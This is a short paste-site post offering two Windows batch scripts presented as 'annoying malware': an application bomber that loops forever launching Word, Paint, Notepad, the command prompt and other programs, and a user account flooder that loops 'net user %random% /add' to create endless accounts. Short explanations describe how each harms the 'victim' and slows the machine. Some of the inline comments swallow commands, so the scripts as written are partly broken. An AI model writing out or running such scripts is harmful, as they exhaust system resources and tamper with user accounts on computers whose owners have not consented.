Simple Annoying Malware


SUBMITTED BY: ProffesorFaux

DATE: April 6, 2020, 4:12 p.m.

FORMAT: Text only

SIZE: 658 Bytes

HITS: 455

  1. 1. Application Bomber
  2. @echo off // It instructs to hide the commands when batch files is executed :x //loop variable
  3. start winword
  4. start mspaint //open paint
  5. start notepad
  6. start write
  7. start cmd //open command prompt start explorer
  8. start control
  9. start calc // open calculator
  10. goto x // infinite loop
  11. This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and of course affecting performance.
  12. 2.User account flooder
  13. @echo off
  14. :x
  15. net user %random% /add //create user account goto x
  16. This code would start creating windows user accounts whose names could be any random numbers

comments powered by Disqus